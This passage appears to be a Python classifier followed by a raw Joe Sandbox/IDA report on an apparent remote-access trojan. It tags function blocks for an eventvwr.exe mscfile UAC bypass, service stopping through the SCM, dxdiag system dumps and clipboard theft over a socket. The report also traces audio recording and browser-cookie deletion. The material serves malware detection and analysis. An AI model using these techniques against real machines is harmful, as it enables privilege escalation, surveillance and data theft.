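# One "• Name.MODULE(args), ref: ADDR" line, optionally prefixed "Part of subcall function X:".
API_RE = re.compile(
    r"^•\s*(?:Part of subcall function [0-9A-Fa-f]+:\s*)?"
    r"(\w+)\.(\w+)(?:\(([^)]*)\))?\s*,?\s*ref:\s*([0-9A-Fa-f]+)"
)
STRING_RE = re.compile(r"^•\s*String ID:\s*(.*)$")   # "$"-separated string constants
END_RE = re.compile(r"^•\s*Instruction Fuzzy Hash:")  # last line of every function block
SERVICE_CONTROL_STOP = "00000001"  # dwControl as it appears in the ControlService trace


@dataclass
class Function:
    apis: list = field(default_factory=list)     # (name, module, [args], ref)
    strings: list = field(default_factory=list)

    def has(self, *names):
        called = {a[0] for a in self.apis}
        return all(n in called for n in names)

    def string_contains(self, needle):
        return any(needle.lower() in s.lower() for s in self.strings)


def parse_functions(text):
    """Split report text into Function records, one per IDA-plugin block."""
    funcs, cur = [], Function()
    for raw in text.splitlines():
        line = raw.strip()
        m = API_RE.match(line)
        if m:
            name, module, args, ref = m.groups()
            cur.apis.append((name, module, (args or "").split(","), ref))
        elif STRING_RE.match(line):
            cur.strings.extend(s for s in STRING_RE.match(line).group(1).split("$") if s)
        elif END_RE.match(line):
            funcs.append(cur)
            cur = Function()
    return funcs


# Each rule returns a label or None. Assumption: the sandbox prints observed stack
# arguments in call order, so args[1] of ControlService is dwControl.
def rule_uac_bypass_mscfile(f):
    if (f.string_contains(r"mscfile\shell\open\command") and f.string_contains("eventvwr.exe")
            and any(a[0].startswith("ShellExecute") for a in f.apis)):
        return "eventvwr.exe mscfile handler hijack (UAC bypass pattern)"

def rule_service_stop(f):
    if f.has("OpenSCManagerW", "OpenServiceW", "ControlService"):
        for name, _, args, _ in f.apis:
            if name == "ControlService" and len(args) > 1 and args[1] == SERVICE_CONTROL_STOP:
                return "stops a service through the SCM (SERVICE_CONTROL_STOP)"

def rule_dxdiag_sysinfo(f):
    if (any(a[0] == "ShellExecuteW" and "dxdiag" in a[2] for a in f.apis)
            and f.string_contains("sysinfo.txt") and f.has("DeleteFileW")):
        return "dumps system info with dxdiag /t to a temp file, then deletes it"

def rule_clipboard_exfil(f):
    if f.has("OpenClipboard", "GetClipboardData", "send"):
        return "reads the clipboard and sends it over a socket"

RULES = [rule_uac_bypass_mscfile, rule_service_stop, rule_dxdiag_sysinfo, rule_clipboard_exfil]

def classify(text):
    # Per function block, the names of the rules that fired (block order preserved).
    return [[r.__name__[len("rule_"):] for r in RULES if r(f)] for f in parse_functions(text)]


# Four blocks copied from the report above (other block lines omitted; the parser ignores them).
SAMPLE = r"""
APIs
• OpenSCManagerW.ADVAPI32(00000000,00000000,00000011,00000000,00000001,?,?,?,?,?,?,0041843C,00000000), ref: 00418AD2
• OpenServiceW.ADVAPI32(00000000,00000000,000F003F,?,?,?,?,?,?,0041843C,00000000), ref: 00418AE9
• ControlService.ADVAPI32(00000000,00000001,?,?,?,?,?,?,?,0041843C,00000000), ref: 00418B05
• String ID:
• Instruction Fuzzy Hash: A211E9715002186FD610EF64DC89CFF3B6CDF41B96741012AFA0593192DF789D469AF5
APIs
• ShellExecuteW.SHELL32(00000000,open,dxdiag,00000000,00000000,00000000), ref: 00415A1A
• DeleteFileW.KERNEL32(00000000), ref: 00415A7A
• String ID: /t $\sysinfo.txt$dxdiag$open$temp
• Instruction Fuzzy Hash: FA315E719402199ACB04FBA1DC96DEE7768EF50308F40017FF506731E2EE785E8ACA99
APIs
• ShellExecuteW.SHELL32(00000000,open,00000000,00469654,00469654,00000000), ref: 00406775
• String ID: H"G$Software\Classes\mscfile\shell\open\command$eventvwr.exe$mscfile\shell\open\command$open$origmsc
• Instruction Fuzzy Hash: 36110571A4420166D704B7A2DC57FEF32689B10B09F50003FF906B61D2EEBC5A4982DE
APIs
• OpenClipboard.USER32 ref: 00414F41
• GetClipboardData.USER32(0000000D), ref: 00414F6C
  • Part of subcall function 00404A81: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B16
• String ID:
• Instruction Fuzzy Hash: 7C015E312443009BD314BF71DC596AA76A8EBE0346F81057EB94A931A3DF3899498A9A
"""

if __name__ == "__main__":
    for i, hits in enumerate(classify(SAMPLE)):
        print(f"function {i}: {hits}")
```

Feed classify() a saved copy of the report text to get one label list per function block. The parser keys only on the API lines, the String ID line and the Instruction Fuzzy Hash line, so the remaining fields of each block can be left in place; new rules are plain functions over Function.apis and Function.strings appended to RULES.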
                                APIs
                                • GetConsoleCP.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,00447ECC,00453EB5,00000000,00000000,00000000,00000000,00000000), ref: 00447799
                                • __fassign.LIBCMT ref: 00447814
                                • __fassign.LIBCMT ref: 0044782F
                                • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,00000000,00000005,00000000,00000000), ref: 00447855
                                • WriteFile.KERNEL32(?,00000000,00000000,00447ECC,00000000,?,?,?,?,?,?,?,?,?,00447ECC,00453EB5), ref: 00447874
                                • WriteFile.KERNEL32(?,00453EB5,00000001,00447ECC,00000000,?,?,?,?,?,?,?,?,?,00447ECC,00453EB5), ref: 004478AD
                                Memory Dump Source
                                • Source File: 0000000E.00000002.1357241018.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_14_2_400000_xASiLfzXONGIW.jbxd
                                Yara matches
                                Similarity
                                • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                • String ID:
                                • API String ID: 1324828854-0
                                • Opcode ID: a748b16374f527b7a80cf69ed727348adf3f69da4df0249be72511d103bd3332
                                • Instruction ID: 74b5e8c6f427b63fe2026e60454d3d85c0c1d9029b0a2cc1a9ecb7a500eaa1fe
                                • Opcode Fuzzy Hash: a748b16374f527b7a80cf69ed727348adf3f69da4df0249be72511d103bd3332
                                • Instruction Fuzzy Hash: 32510870E042499FEB10DFA8DC85AEEBBF8EF09300F14416BE951E7291E7749941CB69
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 0000000E.00000002.1357241018.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_14_2_400000_xASiLfzXONGIW.jbxd
                                Yara matches
                                Similarity
                                • API ID: _free
                                • String ID: $-E$$-E
                                • API String ID: 269201875-3140958853
                                • Opcode ID: e48a72c45575700ceddfc4a13269a7974e50b6c85b9f24d2dc50821f03aae928
                                • Instruction ID: 9707d98a659f88f98630b1874925085f47dfd26ea07d7c57405a666b90b138a8
                                • Opcode Fuzzy Hash: e48a72c45575700ceddfc4a13269a7974e50b6c85b9f24d2dc50821f03aae928
                                • Instruction Fuzzy Hash: 69412C32A041006BDB21AFBA8C4666F3BA5DF453B7F10461FFC18D6293DB3C8E15466A
                                APIs
                                • _strftime.LIBCMT ref: 00401D30
                                  • Part of subcall function 00401A4D: CreateFileW.KERNEL32(00000000,40000000,00000000), ref: 00401AB9
                                • waveInUnprepareHeader.WINMM(0046FA78,00000020,00000000,?), ref: 00401DE2
                                • waveInPrepareHeader.WINMM(0046FA78,00000020), ref: 00401E20
                                • waveInAddBuffer.WINMM(0046FA78,00000020), ref: 00401E2F
                                Strings
                                Memory Dump Source
                                • Source File: 0000000E.00000002.1357241018.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_14_2_400000_xASiLfzXONGIW.jbxd
                                Yara matches
                                Similarity
                                • API ID: wave$Header$BufferCreateFilePrepareUnprepare_strftime
                                • String ID: %Y-%m-%d %H.%M$.wav
                                • API String ID: 3809562944-3597965672
                                • Opcode ID: b10e30c525f246f4611f68b91188478031edfba2b9a6cbdc9954c4cf903c77cf
                                • Instruction ID: eb6f517cf981021e41f9baa65c06222081641aa24e02a1e4c78245b08a68fc14
                                • Opcode Fuzzy Hash: b10e30c525f246f4611f68b91188478031edfba2b9a6cbdc9954c4cf903c77cf
                                • Instruction Fuzzy Hash: 743150315043009BC314EBA1EC56A9E77E8FB54318F50893EF599A21F2EFB49909CB5E
                                APIs
                                  • Part of subcall function 00411F91: RegOpenKeyExA.ADVAPI32(80000002,00000400,00000000,00020019,?), ref: 00411FB5
                                  • Part of subcall function 00411F91: RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,?,00000400), ref: 00411FD2
                                  • Part of subcall function 00411F91: RegCloseKey.ADVAPI32(?), ref: 00411FDD
                                • ExpandEnvironmentStringsA.KERNEL32(00000000,?,00000104,00000000), ref: 0040AEAC
                                • PathFileExistsA.SHLWAPI(?), ref: 0040AEB9
                                Strings
                                Memory Dump Source
                                • Source File: 0000000E.00000002.1357241018.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_14_2_400000_xASiLfzXONGIW.jbxd
                                Yara matches
                                Similarity
                                • API ID: CloseEnvironmentExistsExpandFileOpenPathQueryStringsValue
                                • String ID: [IE cookies cleared!]$[IE cookies not found]$Cookies$Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders
                                • API String ID: 1133728706-4073444585
                                • Opcode ID: 2710e71acfe910868fa7bd05cf86435756edf937fb7501142c457778cac90120
                                • Instruction ID: 9e227284a7a69f00510d3be81dd7cde1580ac9a58a9ca8fbd928e09bf644cbd9
                                • Opcode Fuzzy Hash: 2710e71acfe910868fa7bd05cf86435756edf937fb7501142c457778cac90120
                                • Instruction Fuzzy Hash: CF21B170A4020556CB00FBE2CC97DEE7368AF51348F80013FB901772D2EB795A45C6DA
                                Memory Dump Source
                                • Source File: 0000000E.00000002.1357241018.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_14_2_400000_xASiLfzXONGIW.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: a9bccf30988101774ee440fa5cc9a08b358316fbf5677ac8bfda6d7ead677197
                                • Instruction ID: 106e2cecea33a690a52cc41c1271e31c3df1f85e8271d36c5dacef07d135bc52
                                • Opcode Fuzzy Hash: a9bccf30988101774ee440fa5cc9a08b358316fbf5677ac8bfda6d7ead677197
                                • Instruction Fuzzy Hash: 2C113232504214BBCB213F769C0596B7B7CDF857A7F11062BFC1583292DA38C9089269
                                APIs
                                  • Part of subcall function 0044DE21: _free.LIBCMT ref: 0044DE4A
                                • _free.LIBCMT ref: 0044E128
                                  • Part of subcall function 00443C92: HeapFree.KERNEL32(00000000,00000000,?,0044DE4F,?,00000000,?,00000000,?,0044E0F3,?,00000007,?,?,0044E63E,?), ref: 00443CA8
                                  • Part of subcall function 00443C92: GetLastError.KERNEL32(?,?,0044DE4F,?,00000000,?,00000000,?,0044E0F3,?,00000007,?,?,0044E63E,?,?), ref: 00443CBA
                                • _free.LIBCMT ref: 0044E133
                                • _free.LIBCMT ref: 0044E13E
                                • _free.LIBCMT ref: 0044E192
                                • _free.LIBCMT ref: 0044E19D
                                • _free.LIBCMT ref: 0044E1A8
                                • _free.LIBCMT ref: 0044E1B3
                                Memory Dump Source
                                • Source File: 0000000E.00000002.1357241018.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_14_2_400000_xASiLfzXONGIW.jbxd
                                Yara matches
                                Similarity
                                • API ID: _free$ErrorFreeHeapLast
                                • String ID:
                                • API String ID: 776569668-0
                                • Opcode ID: d645742a9f031bfd4c53cfe37fe00a001808073c56fe889b6c8b285726f20831
                                • Instruction ID: b65b67035ea7ffc6fe2c1778d32cb4f6cbb79ca162155871331ff7aa41bb66fd
                                • Opcode Fuzzy Hash: d645742a9f031bfd4c53cfe37fe00a001808073c56fe889b6c8b285726f20831
                                • Instruction Fuzzy Hash: 64111571940B08AAE520BFF2CC47FCBB7DC9F14708F50882EB29D6A552DA7DB6044654
                                APIs
                                  • Part of subcall function 00419F23: GetCurrentProcess.KERNEL32(?,?,?,0040C663,WinDir,00000000,00000000), ref: 00419F34
                                  • Part of subcall function 00411F91: RegOpenKeyExA.ADVAPI32(80000002,00000400,00000000,00020019,?), ref: 00411FB5
                                  • Part of subcall function 00411F91: RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,?,00000400), ref: 00411FD2
                                  • Part of subcall function 00411F91: RegCloseKey.ADVAPI32(?), ref: 00411FDD
                                • StrToIntA.SHLWAPI(00000000,00469710,00000000,00000000,00000000,00471FFC,00000001,?,?,?,?,?,?,0040D6A0), ref: 00419327
                                Strings
                                Memory Dump Source
                                • Source File: 0000000E.00000002.1357241018.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_14_2_400000_xASiLfzXONGIW.jbxd
                                Yara matches
                                Similarity
                                • API ID: CloseCurrentOpenProcessQueryValue
                                • String ID: (32 bit)$ (64 bit)$CurrentBuildNumber$ProductName$SOFTWARE\Microsoft\Windows NT\CurrentVersion
                                • API String ID: 1866151309-2070987746
                                • Opcode ID: 905e145e97e877e89bffcd847be86f3e5d4b8ef02cc69856730a9e086f165d02
                                • Instruction ID: a9b62d1d1389f8d2b696bc63f2982e792167bed2dd8bed00043a633dd184e9c5
                                • Opcode Fuzzy Hash: 905e145e97e877e89bffcd847be86f3e5d4b8ef02cc69856730a9e086f165d02
                                • Instruction Fuzzy Hash: E411E371A002456AC704B765CC67AAF761D8B54309F64053FF905A71E2FABC4D8282AA
                                APIs
                                • GetLastError.KERNEL32(?,?,004380F1,0043705E), ref: 00438108
                                • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00438116
                                • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 0043812F
                                • SetLastError.KERNEL32(00000000,?,004380F1,0043705E), ref: 00438181
                                Memory Dump Source
                                • Source File: 0000000E.00000002.1357241018.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_14_2_400000_xASiLfzXONGIW.jbxd
                                Yara matches
                                Similarity
                                • API ID: ErrorLastValue___vcrt_
                                • String ID:
                                • API String ID: 3852720340-0
                                • Opcode ID: a51cd608757b9cf21dde5cb3b99bb74488ace4818edb59339c74db540250a301
                                • Instruction ID: 5a832d73688d02476ca7511e273f3515cfb573674d76dbd3fe9934521fa1a72b
                                • Opcode Fuzzy Hash: a51cd608757b9cf21dde5cb3b99bb74488ace4818edb59339c74db540250a301
                                • Instruction Fuzzy Hash: F101283210C3326EAA102F767C85A1BAA94EB09779F31633FF214951E1FFA99C02550C
                                APIs
                                • DeleteFileA.KERNEL32(00000000,\AppData\Local\Google\Chrome\User Data\Default\Cookies), ref: 0040AA1E
                                • GetLastError.KERNEL32 ref: 0040AA28
                                Strings
                                • [Chrome Cookies found, cleared!], xrefs: 0040AA4E
                                • UserProfile, xrefs: 0040A9EE
                                • [Chrome Cookies not found], xrefs: 0040AA42
                                • \AppData\Local\Google\Chrome\User Data\Default\Cookies, xrefs: 0040A9E9
                                Memory Dump Source
                                • Source File: 0000000E.00000002.1357241018.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_14_2_400000_xASiLfzXONGIW.jbxd
                                Yara matches
                                Similarity
                                • API ID: DeleteErrorFileLast
                                • String ID: [Chrome Cookies found, cleared!]$[Chrome Cookies not found]$UserProfile$\AppData\Local\Google\Chrome\User Data\Default\Cookies
                                • API String ID: 2018770650-304995407
                                • Opcode ID: b4927beb3b7d8682d6e8687247d88e98b96e581d4f5d1102126ce03b4be6211c
                                • Instruction ID: 1f34f6daae66b163f55af04f15e1d0b60933b3567ae099988c08ef58cbd90c9e
                                • Opcode Fuzzy Hash: b4927beb3b7d8682d6e8687247d88e98b96e581d4f5d1102126ce03b4be6211c
                                • Instruction Fuzzy Hash: 0E01F731B4020467C6047A75DD278AE77249951304B50057FF402773D2FD798915CA9F
                                APIs
                                  • Part of subcall function 004194DA: GetLocalTime.KERNEL32(00000000), ref: 004194F4
                                • GetModuleHandleA.KERNEL32(00000000,00020009), ref: 00418DA8
                                • PlaySoundW.WINMM(00000000,00000000), ref: 00418DB6
                                • Sleep.KERNEL32(00002710), ref: 00418DBD
                                • PlaySoundW.WINMM(00000000,00000000,00000000), ref: 00418DC6
                                Strings
                                Memory Dump Source
                                • Source File: 0000000E.00000002.1357241018.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_14_2_400000_xASiLfzXONGIW.jbxd
                                Yara matches
                                Similarity
                                • API ID: PlaySound$HandleLocalModuleSleepTime
                                • String ID: Alarm triggered$`Mw
                                • API String ID: 614609389-968373943
                                • Opcode ID: bdf6e914fbef22af66a0bd792b19461622f07135ad8277a1fc3addc14a55c3ce
                                • Instruction ID: 312fa8acbc24107594bc9953998d05cc744500d2263fe9839a2dc32143519282
                                • Opcode Fuzzy Hash: bdf6e914fbef22af66a0bd792b19461622f07135ad8277a1fc3addc14a55c3ce
                                • Instruction Fuzzy Hash: 9EE01226E4026037A510376A6D0FC6F2D2DDBD3B6274501AFFA04571D2D9A4080186FF
                                APIs
                                • __allrem.LIBCMT ref: 00438A09
                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00438A25
                                • __allrem.LIBCMT ref: 00438A3C
                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00438A5A
                                • __allrem.LIBCMT ref: 00438A71
                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00438A8F
                                Memory Dump Source
                                • Source File: 0000000E.00000002.1357241018.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_14_2_400000_xASiLfzXONGIW.jbxd
                                Yara matches
                                Similarity
                                • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@
                                • String ID:
                                • API String ID: 1992179935-0
                                • Opcode ID: e54fcd2a271a95563de48233a52a921a5b89548056e17f80f76cd68e5be4f8c8
                                • Instruction ID: 1db505a437643d25cad1e1ab06004ebe691486694b679651004c0d70fbe8f9c1
                                • Opcode Fuzzy Hash: e54fcd2a271a95563de48233a52a921a5b89548056e17f80f76cd68e5be4f8c8
                                • Instruction Fuzzy Hash: CD815972A007069BE724BA29CC41B6BF3E8AF49328F14512FF511D6382EF78D900875D
                                APIs
                                Memory Dump Source
                                • Source File: 0000000E.00000002.1357241018.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_14_2_400000_xASiLfzXONGIW.jbxd
                                Yara matches
                                Similarity
                                • API ID: __cftoe
                                • String ID:
                                • API String ID: 4189289331-0
                                • Opcode ID: 6721aee484eec6af142a787e0ccbed3fea0baaedfcb9b8799baac12631cf5e23
                                • Instruction ID: 4563a9c63fae0d6d7f7aa9a83d474a3ec136fb2d14012502de5dff0b8c27d610
                                • Opcode Fuzzy Hash: 6721aee484eec6af142a787e0ccbed3fea0baaedfcb9b8799baac12631cf5e23
                                • Instruction Fuzzy Hash: CB510C32500205ABFB209F598E45EAF77B8EF48334FE0421FF415D6282EB79D941966C
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 0000000E.00000002.1357241018.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_14_2_400000_xASiLfzXONGIW.jbxd
                                Yara matches
                                Similarity
                                • API ID: __freea$__alloca_probe_16_free
                                • String ID: a/p$am/pm
                                • API String ID: 2936374016-3206640213
                                • Opcode ID: 5bf20948ecfdcfc47f5d03c18463ec118060d09d36ce90c1cff5387842e26ce9
                                • Instruction ID: 5910b70c00eb86a61931efff1dda8232d7c1eee9eff2524394b85f82b3a3e216
                                • Opcode Fuzzy Hash: 5bf20948ecfdcfc47f5d03c18463ec118060d09d36ce90c1cff5387842e26ce9
                                • Instruction Fuzzy Hash: 05D1E171900206CAFB289F68C895BBBB7B1FF85300F29415BE905AB391D73D9D81CB59
                                APIs
                                • std::_Lockit::_Lockit.LIBCPMT ref: 0040F8C4
                                • int.LIBCPMT ref: 0040F8D7
                                  • Part of subcall function 0040CAE9: std::_Lockit::_Lockit.LIBCPMT ref: 0040CAFA
                                  • Part of subcall function 0040CAE9: std::_Lockit::~_Lockit.LIBCPMT ref: 0040CB14
                                • std::_Facet_Register.LIBCPMT ref: 0040F917
                                • std::_Lockit::~_Lockit.LIBCPMT ref: 0040F920
                                • __CxxThrowException@8.LIBVCRUNTIME ref: 0040F93E
                                • __Init_thread_footer.LIBCMT ref: 0040F97F
                                Memory Dump Source
                                • Source File: 0000000E.00000002.1357241018.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_14_2_400000_xASiLfzXONGIW.jbxd
                                Yara matches
                                Similarity
                                • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_Init_thread_footerRegisterThrow
                                • String ID:
                                • API String ID: 3815856325-0
                                • Opcode ID: 296aa1fc45bd8a97e11338d30c2ad026eda8063a32206ad78c4166fd1b77079b
                                • Instruction ID: 3bb9722abb9e04fd13c8d4025e7ce1c878c76566b3017ce531706a3e1b7c3414
                                • Opcode Fuzzy Hash: 296aa1fc45bd8a97e11338d30c2ad026eda8063a32206ad78c4166fd1b77079b
                                • Instruction Fuzzy Hash: 90212232900104EBCB24EBA9E94699E7378AB08324F20017FF844B72D1DB389F458BD9
                                APIs
                                • OpenSCManagerW.ADVAPI32(00000000,00000000,00000002,00000000,00000000,?,?,?,00418344,00000000), ref: 00418C3E
                                • OpenServiceW.ADVAPI32(00000000,00000000,00000002,?,?,?,00418344,00000000), ref: 00418C52
                                • CloseServiceHandle.ADVAPI32(00000000,?,?,?,00418344,00000000), ref: 00418C5F
                                • ChangeServiceConfigW.ADVAPI32(00000000,000000FF,00000004,000000FF,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,00418344,00000000), ref: 00418C94
                                • CloseServiceHandle.ADVAPI32(00000000,?,?,?,00418344,00000000), ref: 00418CA6
                                • CloseServiceHandle.ADVAPI32(00000000,?,?,?,00418344,00000000), ref: 00418CA9
                                Memory Dump Source
                                • Source File: 0000000E.00000002.1357241018.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_14_2_400000_xASiLfzXONGIW.jbxd
                                Yara matches
                                Similarity
                                • API ID: Service$CloseHandle$Open$ChangeConfigManager
                                • String ID:
                                • API String ID: 493672254-0
                                • Opcode ID: 6b3aada76383092df42fd9d8378ae16ca6440a91692c2fe76f90724c69c65514
                                • Instruction ID: 151ede47f5a01f66990efdacd58a0b59027112db6305451f0336687f4909308b
                                • Opcode Fuzzy Hash: 6b3aada76383092df42fd9d8378ae16ca6440a91692c2fe76f90724c69c65514
                                • Instruction Fuzzy Hash: A20149711862183AE6108B389C4EEBB3A6CDB42771F14032FF925A32D1EE68CD4185F9
                                APIs
                                • GetLastError.KERNEL32(?,0043EE9A,00438595,0043EE9A,00471E90,?,0043CC1A,FF8BC35D,00471E90,00471E90), ref: 00445729
                                • _free.LIBCMT ref: 0044575C
                                • _free.LIBCMT ref: 00445784
                                • SetLastError.KERNEL32(00000000,FF8BC35D,00471E90,00471E90), ref: 00445791
                                • SetLastError.KERNEL32(00000000,FF8BC35D,00471E90,00471E90), ref: 0044579D
                                • _abort.LIBCMT ref: 004457A3
                                Memory Dump Source
                                • Source File: 0000000E.00000002.1357241018.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_14_2_400000_xASiLfzXONGIW.jbxd
                                Yara matches
                                Similarity
                                • API ID: ErrorLast$_free$_abort
                                • String ID:
                                • API String ID: 3160817290-0
                                • Opcode ID: beb673fc776bdcf0cb4aa2f907b8faed87466b0c6696de81e80bb7a9f8cba6db
                                • Instruction ID: 2afc6a99b93033dbed13f8def56e2284daf42193b39b630cfab03248b002a5f8
                                • Opcode Fuzzy Hash: beb673fc776bdcf0cb4aa2f907b8faed87466b0c6696de81e80bb7a9f8cba6db
                                • Instruction Fuzzy Hash: 6EF0FE35100F0067FA117B367C8AB2F1A695FC2B2AF21013BF419D6293EE3DC902452D
                                APIs
                                • OpenSCManagerW.ADVAPI32(00000000,00000000,00000020,00000000,00000001,?,?,?,?,?,?,004185D9,00000000), ref: 00418A6B
                                • OpenServiceW.ADVAPI32(00000000,00000000,00000020,?,?,?,?,?,?,004185D9,00000000), ref: 00418A7F
                                • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,004185D9,00000000), ref: 00418A8C
                                • ControlService.ADVAPI32(00000000,00000001,?,?,?,?,?,?,?,004185D9,00000000), ref: 00418A9B
                                • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,004185D9,00000000), ref: 00418AAD
                                • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,004185D9,00000000), ref: 00418AB0
                                Memory Dump Source
                                • Source File: 0000000E.00000002.1357241018.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_14_2_400000_xASiLfzXONGIW.jbxd
                                Yara matches
                                Similarity
                                • API ID: Service$CloseHandle$Open$ControlManager
                                • String ID:
                                • API String ID: 221034970-0
                                • Opcode ID: f9d93c7612eed7e1ddf8c3953865d04e5265de3587757247bbfd6a1c47877660
                                • Instruction ID: 4afe7732e2fa81f36ccf108e41ed7890102f29a09d0e479adccf976045b68e04
                                • Opcode Fuzzy Hash: f9d93c7612eed7e1ddf8c3953865d04e5265de3587757247bbfd6a1c47877660
                                • Instruction Fuzzy Hash: A4F0C2315013186BD210EBA5DC89EBF3BACDF45B96B41002BFD0993192DF38CD4689E9
                                APIs
                                • OpenSCManagerW.ADVAPI32(00000000,00000000,00000040,00000000,00000001,?,?,?,?,?,?,00418559,00000000), ref: 00418B6F
                                • OpenServiceW.ADVAPI32(00000000,00000000,00000040,?,?,?,?,?,?,00418559,00000000), ref: 00418B83
                                • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,00418559,00000000), ref: 00418B90
                                • ControlService.ADVAPI32(00000000,00000002,?,?,?,?,?,?,?,00418559,00000000), ref: 00418B9F
                                • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,00418559,00000000), ref: 00418BB1
                                • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,00418559,00000000), ref: 00418BB4
                                Memory Dump Source
                                • Source File: 0000000E.00000002.1357241018.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_14_2_400000_xASiLfzXONGIW.jbxd
                                Yara matches
                                Similarity
                                • API ID: Service$CloseHandle$Open$ControlManager
                                • String ID:
                                • API String ID: 221034970-0
                                • Opcode ID: 027b45ec19db43cd3e6d09ceb5389eefa79acdbdadc7d59ed190380558829436
                                • Instruction ID: 20460b91a854b5e3c53015269073f2e928c2deccd9acf6b4d89527a320d4dccf
                                • Opcode Fuzzy Hash: 027b45ec19db43cd3e6d09ceb5389eefa79acdbdadc7d59ed190380558829436
                                • Instruction Fuzzy Hash: 22F0C2715402186BD210EB65DC89EBF3BACDB45B52B81006AFE09A3192DE38DD4589E9
                                APIs
                                • OpenSCManagerW.ADVAPI32(00000000,00000000,00000040,00000000,00000001,?,?,?,?,?,?,004184D9,00000000), ref: 00418BD6
                                • OpenServiceW.ADVAPI32(00000000,00000000,00000040,?,?,?,?,?,?,004184D9,00000000), ref: 00418BEA
                                • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,004184D9,00000000), ref: 00418BF7
                                • ControlService.ADVAPI32(00000000,00000003,?,?,?,?,?,?,?,004184D9,00000000), ref: 00418C06
                                • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,004184D9,00000000), ref: 00418C18
                                • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,004184D9,00000000), ref: 00418C1B
                                Memory Dump Source
                                • Source File: 0000000E.00000002.1357241018.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_14_2_400000_xASiLfzXONGIW.jbxd
                                Yara matches
                                Similarity
                                • API ID: Service$CloseHandle$Open$ControlManager
                                • String ID:
                                • API String ID: 221034970-0
                                • Opcode ID: 60f77fd359bc8166b0f1f63c621f75235c8633bea2de10f026708dad38e6f72c
                                • Instruction ID: 1da220ff3ffe1d32b0df5c47a21bcd1adf2661b27de4fa42f8fed5365a22baa8
                                • Opcode Fuzzy Hash: 60f77fd359bc8166b0f1f63c621f75235c8633bea2de10f026708dad38e6f72c
                                • Instruction Fuzzy Hash: 32F0C2715012186BD210EB65EC89DBF3BACDB45B51B41002AFE0993192DF38CD4589F9
                                APIs
